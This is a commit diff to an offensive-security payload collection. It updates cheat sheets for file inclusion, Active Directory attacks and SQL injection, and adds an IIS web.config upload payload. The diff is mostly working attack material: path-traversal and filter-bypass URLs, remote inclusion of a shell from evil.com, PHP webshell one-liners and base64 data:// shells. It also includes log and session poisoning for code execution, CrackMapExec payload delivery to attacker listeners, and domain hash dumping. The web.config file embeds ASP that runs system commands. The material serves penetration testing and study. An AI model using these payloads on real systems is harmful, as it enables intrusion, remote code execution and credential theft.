Path traversal refactor + AD cme module msf/empire + IIS web.config

File Inclusion - Path Traversal/README.md

@@ -1,6 +1,23 @@
 # Local/Remote File Inclusion
 The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application.
 
+## Summary
+* [Basic LFI](#basic-lfi)
+* [Basic RFI](#basic-rfi)
+* [LFI / RFI using wrappers](#lfi--rfi-using-wrappers)
+  * [Wrapper php://filter]()
+  * [Wrapper zip://]()
+  * [Wrapper data://]()
+  * [Wrapper expect://]()
+  * [Wrapper input://]()
+* [LFI to RCE via /proc/*/fd](#lfi-to-rce-via-procfd)
+* [LFI to RCE via /proc/self/environ](#lfi-to-rce-via-procselfenviron)
+* [LFI to RCE via upload](#lfi-to-rce-via-upload)
+* [LFI to RCE via phpinfo()](#lfi-to-rce-via-phpinfo)
+* [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file)
+* [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions)
+
+
 Interesting files to check out :
 ```
 /etc/issue
@@ -20,6 +37,9 @@ Interesting files to check out :
 /proc/net/route
 /proc/net/tcp
 /proc/net/udp
+```
+The following log files are controllable and can be included with an evil payload to achieve a command execution
+```
 /var/log/apache/access.log
 /var/log/apache/error.log
 /var/log/httpd/error_log
@@ -30,47 +50,68 @@ Interesting files to check out :
 /var/log/mail
 ```
 
+
 ## Basic LFI
 ```
 http://example.com/index.php?page=../../../etc/passwd
+```
 
 Null byte
+```
 http://example.com/index.php?page=../../../etc/passwd%00
+```
 
 Double encoding
+```
 http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
 http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
+```
 
 Path truncation
+```
 http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
 http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
+```
 
-Filter bypass
+Filter bypass tricks
+```
 http://example.com/index.php?page=....//....//etc/passwd
 http://example.com/index.php?page=..///////..////..//////etc/passwd
+http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
 ```
 
-## Basic RFI (null byte, double encoding and other tricks)
+## Basic RFI
 ```
 http://example.com/index.php?page=http://evil.com/shell.txt
+```
+
+Null byte
+```
 http://example.com/index.php?page=http://evil.com/shell.txt%00
+```
+
+Double encoding
+```
 http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
 ```
 
-## LFI / RFI Wrappers
+## LFI / RFI using wrappers
 
-LFI Wrapper rot13 and base64 - php://filter case insensitive
+### Wrapper php://filter
+The part "php://filter" is case insensitive
 ```
 http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
 http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
 http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
+```
 
-can be chained with a compression wrapper
+can be chained with a compression wrapper for large files.
+```
 http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
 ```
 
 
-LFI Wrapper ZIP
+### Wrapper zip://
 ```python
 echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;  
 zip payload.zip payload.php;   
@@ -81,50 +122,55 @@ http://example.com/index.php?page=zip://shell.jpg%23payload.php
 ```
 
 
-RFI Wrapper DATA with "<?php system($_GET['cmd']);echo 'Shell done !'; ?>" payload
+### Wrapper data://
 ```
 http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
+NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
 ```
+Fun fact: you can trigger an XSS and bypass the Chrome Auditor with : `http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+`
 
-RFI Wrapper EXPECT
+
+### Wrapper expect://
 ```
 http://example.com/index.php?page=php:expect://id
 http://example.com/index.php?page=php:expect://ls
 ```
 
-Bonus XSS    
-XSS via RFI/LFI with "<svg onload=alert(1)>" payload
-```
-http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
-```
-
-## LFI to RCE via /proc/*/fd
-1. Upload a lot of shells (for example : 100)
-2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD
-with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too)
-/proc/self/environ can also be used
-
-
-## LFI to RCE via Upload
-```
-http://example.com/index.php?page=path/to/uploaded/file.png
-```
-You can injected the <?php system($_GET['c']); ?> into the metadata
-
-## LFI to RCE via Phpinfo()
-https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
-Use the script phpInfoLFI.py (also available at https://www.insomniasec.com/downloads/publications/phpinfolfi.py)
-
-
-## LFI to RCE via input:// stream
+### Wrapper input://
 Specify your payload in the POST parameters
 ```
 http://example.com/index.php?page=php://input
 POST DATA: <? system('id'); ?>
 ```
 
+## LFI to RCE via /proc/*/fd
+1. Upload a lot of shells (for example : 100)
+2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD
+with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too)
+
+## LFI to RCE via /proc/self/environ
+Like a log file, send the payload in the User-Agent, it will be reflected inside the /proc/self/environ file
+```
+GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
+User-Agent: <?=phpinfo(); ?>
+```
+
+
+
+## LFI to RCE via upload
+If you can upload a file, just inject the shell payload in it (e.g : "<?php system($_GET['c']); ?>" ).
+```
+http://example.com/index.php?page=path/to/uploaded/file.png
+```
+In order to keep the file readable it is best to inject into the metadata for the pictures/doc/pdf
+
+## LFI to RCE via phpinfo()
+https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
+Use the script phpInfoLFI.py (also available at https://www.insomniasec.com/downloads/publications/phpinfolfi.py)
+
+
 ## LFI to RCE via controlled log file
-Just append your PHP code into the log file and include it.
+Just append your PHP code into the log file by doing a request to the service (Apache, SSH..) and include the log file.
 ```
 http://example.com/index.php?page=/var/log/apache/access.log
 http://example.com/index.php?page=/var/log/apache/error.log
@@ -136,7 +182,7 @@ http://example.com/index.php?page=/usr/local/apache/log/error_log
 http://example.com/index.php?page=/usr/local/apache2/log/error_log
 ```
 
-## LFI to RCE via PHP Sessions
+## LFI to RCE via PHP sessions
 Check if the website use PHP Session (PHPSESSID)
 ```
 Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
@@ -157,25 +203,6 @@ login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/s
 ```
 
 
-## Checklist - Common ways of upgrading from LFI to RCE
-```
-Using file upload forms/functions
-Using the PHP wrapper expect://command
-Using the PHP wrapper php://file
-Using the PHP wrapper php://filter
-Using PHP input:// stream
-Using data://text/plain;base64,command
-Using /proc/self/environ
-Using /proc/self/fd
-Using PHP Session
-Using log files with controllable input like:
-  /var/log/apache/access.log
-  /var/log/apache/error.log
-  /var/log/vsftpd.log
-  /var/log/sshd.log
-  /var/log/mail
-```
-
 ## Thanks to
 * [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
 * [HighOn.coffee LFI Cheat](https://highon.coffee/blog/lfi-cheat-sheet/)
@@ -183,3 +210,4 @@ Using log files with controllable input like:
 * [Is PHP vulnerable and under what conditions?](http://0x191unauthorized.blogspot.fr/2015/04/is-php-vulnerable-and-under-what.html)
 * [Upgrade from LFI to RCE via PHP Sessions](https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/)
 * [Local file inclusion tricks](http://devels-playground.blogspot.fr/2007/08/local-file-inclusion-tricks.html)
+* [CVV #1: Local File Inclusion - SI9INT](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)

Methodology and Resources/Active Directory Attack.md

@@ -21,7 +21,6 @@
 
 
 ## Tools
-
 * [Impacket](https://github.com/CoreSecurity/impacket) or the [Windows version](https://github.com/maaaaz/impacket-examples-windows)
 * [Responder](https://github.com/SpiderLabs/Responder)
 * [Mimikatz](https://github.com/gentilkiwi/mimikatz)
@@ -33,6 +32,7 @@
 git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
 crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares
 crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
+crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
 ```
 * [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
 ```powershell
@@ -128,6 +128,10 @@ then you need to use secretsdump to extract the hashes
 ```c
 secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
 ```
+secretsdump also works remotely
+```c
+./secretsdump.py IP administrator@domain -use-vss
+```
 
 
 **Alternatives - modules**    
@@ -141,6 +145,11 @@ PowerSploit module
 Invoke-NinjaCopy --path c:\windows\NTDS\ntds.dit --verbose --localdestination c:\ntds.dit
 ```
 
+CrackMapExec module
+```bash
+cme smb 10.10.0.202 -u username -p password --ntds vss
+```
+
 ## Password in AD User comment
 ```powershell
 enum4linux | grep -i desc
@@ -294,6 +303,7 @@ net group "Domain Admins" hacker2 /add /domain
  * [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
  * [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences](https://adsecurity.org/?p=2288)
  * [Golden ticket - Pentestlab](https://pentestlab.blog/2018/04/09/golden-ticket/)
+ * [Dumping Domain Password Hashes - Pentestlab](https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/)
  * [Getting the goods with CrackMapExec: Part 1, by byt3bl33d3r](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html)
  * [Getting the goods with CrackMapExec: Part 2, by byt3bl33d3r ](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-2.html)
  * [Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin](https://hausec.com/2017/10/21/domain-penetration-testing-using-bloodhound-crackmapexec-mimikatz-to-get-domain-admin/)

SQL injection/README.md

@@ -197,6 +197,8 @@ tamper=name_of_the_tamper
 ' or ''&'
 ' or ''^'
 ' or ''*'
+'-||0'
+"-||0"
 "-"
 " "
 "&"

Upload insecure files/IIS Web Config/web.config

@@ -0,0 +1,34 @@
+<?xml version="1.0″ encoding="UTF-8″?>
+<configuration>
+   <system.webServer>
+      <handlers accessPolicy="Read, Script, Write">
+         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64″ />
+      </handlers>
+      <security>
+         <requestFiltering>
+            <fileExtensions>
+               <remove fileExtension=".config" />
+            </fileExtensions>
+            <hiddenSegments>
+               <remove segment="web.config" />
+            </hiddenSegments>
+         </requestFiltering>
+      </security>
+   </system.webServer>
+   <appSettings>
+</appSettings>
+</configuration>
+<!–
+<% Response.write("-"&"->")
+Response.write("</p>
+<pre>")</p>
+<p>Set wShell1 = CreateObject("WScript.Shell")
+Set cmd1 = wShell1.Exec("whoami")
+output1 = cmd1.StdOut.Readall()
+set cmd1 = nothing: Set wShell1 = nothing</p>
+<p>Response.write(output1)
+Response.write("</pre>
+<p><!-"&"-") %>
+–>
+
+<!-- web.config payload from https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/ -->